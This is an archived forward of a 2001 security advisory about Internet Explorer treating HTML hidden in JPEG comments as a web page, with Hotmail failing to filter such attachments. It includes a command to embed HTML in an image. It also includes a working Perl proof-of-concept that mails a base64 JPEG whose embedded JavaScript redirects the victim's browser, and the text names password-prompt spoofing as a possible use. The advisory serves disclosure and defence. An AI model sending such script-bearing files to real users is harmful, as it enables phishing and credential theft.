More fun from the "lets put html in everything" jihad.
Bang Bang Have a nice day
---------- Forwarded message ----------
Date: Thu, 8 Feb 2001 01:35:44 -0500
From: Kee Hinckley <nazgul@SOMEWHERE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Internet Explorer Vulnerability to Web Mail-based Spoofing Attacks
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
VERSIONS AFFECTED
Internet Explorer 5.0 on the Macintosh and 4.0 on Windows both
have the problem. IE 5 on Windows did not seem vulnerable, however
it also didn't display the test image correctly, so there may still be issues.
SUMMARY
First. Internet Explorer has a "feature" which makes it possible to
cause it to display arbitrary HTML that is embedded in an image (or
any other type of file).
Second. Hotmail at least, and most likely all other web-based mail
systems, does not filter out HTML hidden in images (one can hardly
blame them). As a result, the JavaScript and CSS spoofing attacks
previously described on this list can be used against a Macintosh
Hotmail user, and Hotmail will *not* filter out offending HTML,
JavaScript or CSS tags. This technique may also work against some
virus scanners.
DETAILS
When IE reads a file from the web, it doesn't trust the Content-Type or
file ending, instead it examines the first 256 bytes of the file to see if
it recognizes the file type. Apparently this is considered a
feature, although it's caused no-end of pain to web designers who
are trying to assign a different download behavior to a particular
file. The problem does not occur when the file is read from the disk.
The parser that IE uses is not terribly sophisticated. If it sees
one of several common HTML tags in the first 256 bytes, it will
assume that the file is an HTML file, even if the rest of it is
binary garbage. Since it is possible to embed comments in a number
of types of files, and those comments often occur close to the
beginning of the file, it is trivial to convince IE that an image
file is in fact an HTML file. Viewing this file from inside an HTML
page (ie. in an img tag) will show a broken image in IE5 on the Mac
and Windows, although IE4 on Windows shows the image correctly.
However opening it directly in the browser will result in some garbage
characters, followed by the interpreted HTML content.
To create a commented JPG file with embedded HTML, try a command such
as this on a Unix box:
djpeg sample.jpg | cjpeg | wrjpgcom -cfile cfile > html.jpg
where 'cfile' is a file containing html. You may not need the
djpeg/cjpeg combo, but my first attempt just using wrjpgcom didn't
put the comment close enough to the beginning of the file.
Hotmail can be persuaded to treat an image as an attachment by
giving the file a non-standard Content-Type. Since Hotmail doesn't
know that the browser is going to interpret an arbitrary attachment
as an HTML file, it doesn't filter the content of the file. Clicking on
the attachment will cause Hotmail to scan the attachment for viruses
and then ask you if you would like to download it. When you click on
the download button, the window will be replaced for a brief moment
with garbage characters (the raw JPG) and then the HTML will be
displayed. In the case of a JavaScript or CSS exploit, the code would
presumably replace the page of garbage characters with a password
prompt or other item. The user would not unreasonably assume that
something had gone wrong with the software and their session had
expired.
CREDITS
This vulnerability was originally discovered by Anders Pearson and
Peter Leonard of the Columbia Center for New Media Teaching and
Learning <http://ccnmtl.columbia.edu/>. They ran into it when they
were attempting to embed XML in image comments. I heard about
it from a discussion on the WebDesign mailing list
(http://www.webdesign-l.com/) and wrote a test exploit (enclosed
below) to see if Hotmail users were in fact vulnerable.
EXPLOIT
The following Perl script will email a small JPG image to a user. In
order to ensure that the file is treated as an attachment and not
displayed inline, it has given the file the content type "image/jpg"
instead of the proper "image/jpeg". If you mail this to a Mac IE
Hotmail user, and they attempt to download the attached image,
it will redirect their browser to one of my web sites.
Although embedding the HTML in an image makes it more likely
to pass through filters, there is nothing inherent in this process that
requires that it be an image. The user's expectation that they will
be viewing an image file helps from a social engineering context, but
even a text file that has been given a different Content-Type might
pass through filters. The key issue is that the browser thinks it knows
more about the file than the person who sent it, and that it is executing
HTML code when the user is expecting it to download a file--before they
expect to have to worry about the file's content.
#!/usr/bin/perl
# sendit.pl
#
# Sends a JPG image (with a false content type) to the destination email
# address. The JPG contains an embedded HTML comment which will
# cause some versions of Internet Explorer to interpret the file as though
# it were HTML, executing the contained JavaScript and redirecting the browser to
# http://www.spamwatcher.com/.
#
# The HTML in the comment is:
#<html><head><title>foo</title><script>document.location.replace('http://www.spamwatcher.com/')</script></head><body>test</body></html>
#
use Net::SMTP;
die("Use: $0 from to\n") if (!$ARGV[1]);
sendit($ARGV[0], $ARGV[1]);
sub sendit {
my ($from, $to) = @_;
my $smtp;
$smtp = Net::SMTP->new('localhost');
$smtp->mail($to);
$smtp->to($to);
$smtp->data();
$smtp->datasend("To: $to\n");
$smtp->datasend("From: $from\n");
$smtp->datasend("Subject: Test of html.jpg\n");
$smtp->datasend("Content-Type: image/jpg\n");
$smtp->datasend("Content-Transfer-Encoding: base64\n");
$smtp->datasend("Content-Disposition: attachment; filename=html.jpg\n");
$smtp->datasend("\n");
$smtp->datasend(<<X);
/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof
Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL//gCJ
PGh0bWw+PGhlYWQ+PHRpdGxlPmZvbzwvdGl0bGU+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlv
bi5yZXBsYWNlKCdodHRwOi8vd3d3LnNwYW13YXRjaGVyLmNvbS8nKTwvc2NyaXB0PjwvaGVh
ZD48Ym9keT50ZXN0PC9ib2R5PjwvaHRtbD4K/8AAEQgBQADwAwEiAAIRAQMRAf/EAB8AAAEF
AQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUS
ITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZH
SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqy
s7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMB
AQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUh
MQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVG
R0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ip
qrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQAC
EQMRAD8A8cooor9xPNCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiii4BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU
UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFd34pl1CxufENjqen+TZ+Z5VhbCOFlsGaSOVQ
AhIi3RbsleHIOdxUkcJXo3jW/ub/AMKQXFw6KXv9u0XtlOJCFdiwNvGrEhpWLbiADIDhi5I8
TMLrE0FZNNvrqndPT7jSGzPOaKKK9szCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo
oAKKKKACiiigAooooAKKKKACiiigArv/ABlLpkfhu1g0/VbaaZrthcQW9vaokxiaSNZQYVVl
GPmCvkETDaTtY1wFdr4ssdSsNPnstQg0eSS1vVU3enWscIOUYBSViXeMpIowflaOQMCdmPFx
8VLE0LvZt9PLuu9uvpqaQ2ZxVFFFe0ZhRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU
UAFFFFABRRRQAUUUUAFFFFABRRRQAV0us/8ACRz6eW1XW0vreJlfy21qK5IP3QwQSMSeTyBw
Ce2a5qul8SeKItdWVYtNS1WW7e6JMgkYMxZmwwA5JcgnHKxwj/lnlvNxSqutT5IJrW7fTbbX
r8ylazOaooor0iQooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
ACiiigAooooAK7/xvqMesaW+owavc3kUl+S1udRmnigYhmAWN7eMIMEhSWOQGABwSOAr0bx5
d2ep6VLe6bq99eaf9vVIInkvJY4/3bhgzTDaWwEYAEEebIp3KqtXh5il9aoNp7vXottHp16b
GkPhZ5zRRRXuGYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA
BRRRQAUUUUAFehePvD+p6Xp8Qv2+1w2MsVja38lq0DPCEfaigMVKqyS5JXdjYwZlcY89rsfE
Wm22nWEyPZaLa3IYIFii1JJsjaxCicBMhWUkHswI5IrxcdJrE0bN7vS1+2t7pr8TSGzOOooo
r2jMKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
ACvU/iO/+gXgvEkhvJL8BnOmPAbpot4Dh5Lht0eJXwVU4ARTtBQHyyu/8YaBY6L4etriK00t
LmeZ7eRY0uVeNo5GRjGXmZZF3RMCSAQGQkKWGPCzJReLw/M2nd2SSd9t30RpD4WcBRRRXumY
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQB/9k=
X
$smtp->quit();
}
- --
Kee Hinckley - Somewhere.Com, LLC - Cyberspace Architects
Now Playing - Folk, Rock, odd stuff - http://www.somewhere.com/playlist.cgi
I'm not sure which upsets me more: that people are so unwilling to accept
responsibility for their own actions, or that they are so eager to regulate
everyone else's.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOoJDWiZsPfdw+r2CEQJOYACdHbt/pAnHcuE5XN4ISapTVWTV+wYAoLty
m1hgNpQCBUPEidOjuYGH0gc2
=AMA+
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b29 : Fri Apr 27 2001 - 23:17:30 PDT